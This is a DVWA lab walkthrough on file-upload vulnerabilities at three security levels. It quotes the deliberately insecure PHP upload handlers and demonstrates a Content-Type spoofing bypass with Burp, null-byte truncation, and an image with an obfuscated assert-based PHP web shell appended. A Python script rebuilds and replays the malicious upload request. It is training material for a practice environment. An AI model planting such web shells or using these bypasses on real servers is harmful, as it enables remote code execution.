DVWA Upload Vulnerability Mining Test Example

Source: Internet
Author: User
Tags: php, file

Low
<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}

?>
Nothing about the file is checked: the name is taken straight from the upload and the file is written to hackable/uploads/ as-is. Upload a PHP file directly and then request it at http://localhost/hackable/uploads/XX.php.

Medium
<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>
The upload is now filtered, but only on the Content-Type and size that the client sends in the multipart request ($_FILES['uploaded']['type'] and ['size']), so both values are under the attacker's control.
Workaround 1: null-byte (%00) truncation with Burp Suite. Rename the file to 1.php .jpg (note the space before .jpg), intercept the upload, switch to the hex view and change the space byte (0x20) in the filename to 0x00. The .jpg extension makes the browser send Content-Type: image/jpeg, so the type check passes, and old PHP versions stopped reading the path at the null byte and wrote the file as 1.php. PHP 5.3.4 and later reject paths that contain a null byte, so this only works against a legacy install.
Workaround 2: upload 2.php directly, intercept the request and edit it. The captured packet is as follows:


POST /vulnerabilities/upload/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/vulnerabilities/upload/
Cookie: PHPSESSID=pgke4molj8bath1fmdh7mvt686; security=medium
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------143381619322555
Content-Length: 549

-----------------------------143381619322555
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
-----------------------------143381619322555
Content-Disposition: form-data; name="uploaded"; filename="2.php"
Content-Type: application/octet-stream

<?php

$item['wind'] = 'assert';

$array[] = $item;

$array[0]['wind']($_POST['loveautumn']);

?>
-----------------------------143381619322555
Content-Disposition: form-data; name="Upload"

Upload
-----------------------------143381619322555--
The line to edit (highlighted in red in the original capture) is the Content-Type: application/octet-stream header inside the file part; that value is what the Medium check reads as $_FILES['uploaded']['type']. Change it to Content-Type: image/jpeg and forward the request: the check passes and 2.php is written to hackable/uploads/.
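As an added example (not part of the original page or of DVWA's code), the Python below rebuilds the captured request in the same shape, parses it the way PHP populates $_FILES, and replays both Medium-level workarounds against a re-implementation of the Medium check; the Low level is the same flow with no check at all, so anything parsed here would be written to disk. The boundary, field names and session cookie are copied from the capture above; the null-byte helper emulates the pre-5.3.4 PHP behaviour that workaround 1 relies on, not current PHP.

```python
import re

BOUNDARY = "---------------------------143381619322555"  # boundary reused from the capture above

# Constructed copy of the one-line web shell carried in the captured request.
WEBSHELL = (b"<?php\n"
            b"$item['wind'] = 'assert';\n"
            b"$array[] = $item;\n"
            b"$array[0]['wind']($_POST['loveautumn']);\n"
            b"?>\n")


def build_upload_request(filename, content_type, file_bytes, security="medium"):
    """Return the raw POST /vulnerabilities/upload/ request as bytes, in the shape of the
    Burp capture.  filename and content_type are whatever the browser (or Burp) sends;
    the server never sees the real file type, only these client-supplied fields."""
    crlf = b"\r\n"
    sep = b"--" + BOUNDARY.encode()
    body = b"".join([
        sep, crlf,
        b'Content-Disposition: form-data; name="MAX_FILE_SIZE"', crlf, crlf,
        b"100000", crlf,
        sep, crlf,
        b'Content-Disposition: form-data; name="uploaded"; filename="'
        + filename.encode("latin-1") + b'"', crlf,
        b"Content-Type: " + content_type.encode(), crlf, crlf,
        file_bytes, crlf,
        sep, crlf,
        b'Content-Disposition: form-data; name="Upload"', crlf, crlf,
        b"Upload", crlf,
        sep + b"--", crlf,
    ])
    head = (
        "POST /vulnerabilities/upload/ HTTP/1.1\r\n"
        "Host: localhost\r\n"
        "Cookie: PHPSESSID=pgke4molj8bath1fmdh7mvt686; security=%s\r\n"  # cookie from the capture
        "Content-Type: multipart/form-data; boundary=%s\r\n"
        "Content-Length: %d\r\n\r\n" % (security, BOUNDARY, len(body))
    ).encode()
    return head + body


def parse_request(raw):
    """Split the request and parse the multipart body into {field: {filename, content_type, data}},
    the same view of the upload that PHP exposes through $_POST and $_FILES."""
    head, _, body = raw.partition(b"\r\n\r\n")
    boundary = re.search(rb"boundary=([^\r\n]+)", head).group(1)
    fields = {}
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):
            break                                   # closing delimiter
        part_head, _, data = chunk[2:].partition(b"\r\n\r\n")
        headers = {}
        for line in part_head.decode("latin-1").split("\r\n"):
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        params = {}
        for item in headers.get("content-disposition", "").split(";")[1:]:
            name, _, value = item.strip().partition("=")
            params[name] = value.strip('"')
        fields[params["name"]] = {
            "filename": params.get("filename"),
            "content_type": headers.get("content-type"),
            "data": data[:-2],                      # drop the CRLF before the next boundary
        }
    return fields


def medium_check(upload):
    """Re-implementation of the Medium test: trusts the client-supplied Content-Type
    and requires size < 100000.  Nothing inspects the bytes themselves."""
    return (upload["content_type"] in ("image/jpeg", "image/png")
            and len(upload["data"]) < 100000)


def legacy_saved_name(filename):
    """Emulates the pre-5.3.4 PHP behaviour behind workaround 1: filesystem calls stopped at
    the first NUL byte, so '1.php\\x00.jpg' was written as '1.php'.  PHP >= 5.3.4 rejects
    paths containing NUL, so this does not work against a current install."""
    return filename.split("\x00", 1)[0]


def run_workarounds():
    """Replay both Medium-level workarounds and report what the check and the disk would see."""
    plain = parse_request(build_upload_request("2.php", "application/octet-stream", WEBSHELL))["uploaded"]
    spoofed = parse_request(build_upload_request("2.php", "image/jpeg", WEBSHELL))["uploaded"]
    nulled = parse_request(build_upload_request("1.php\x00.jpg", "image/jpeg", WEBSHELL))["uploaded"]
    return {
        "octet-stream rejected": not medium_check(plain),
        "spoofed image/jpeg accepted": medium_check(spoofed),
        "shell bytes survive parsing": spoofed["data"] == WEBSHELL,
        "null byte, name seen by check": nulled["filename"],
        "null byte, name written by old PHP": legacy_saved_name(nulled["filename"]),
    }


if __name__ == "__main__":
    for key, value in run_workarounds().items():
        print(f"{key}: {value!r}")
```

Only the `Content-Type` string inside the file part decides the Medium outcome, which is why editing that one header in Burp is enough; the same request with `security=low` in the cookie would be accepted unconditionally.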


High
<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1 );
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>
The High level restricts both the file name and the file type: the extension is taken from after the last dot and must be jpg, jpeg or png, and getimagesize() must recognise the file as an image, so the file header has to be spoofed. Note what strrpos does to a name such as 1.php.png: the last dot is at offset 5, substr takes everything from offset 6, so the extension the check sees is png; the file is saved as 1.php.png, which the server will not run as PHP.
First open a normal image in Notepad, append the PHP one-liner at the very end of the file and save. This spoofs the type check, because getimagesize() only reads the image header.
What remains is getting past the extension handling. Rename the file to 1.php.png, upload it and intercept with Burp Suite. Changing
Content-Disposition: form-data; name="uploaded"; filename="1.php.png"
to
Content-Disposition: form-data; name="uploaded"; filename="1.php\x00.php.png"
only produces a file named x00.php.png (the literal backslash is not a null byte, and on a Windows host PHP's basename() treats \ as a directory separator and keeps only what follows it); this variant of the trick comes from an article on arbitrary file upload vulnerabilities in PHP. Space truncation does not work either. I do not yet know the final answer; perhaps it can be completed by uploading a JPG that carries the PHP code and then executing it through the file inclusion vulnerability. This remains an open question.
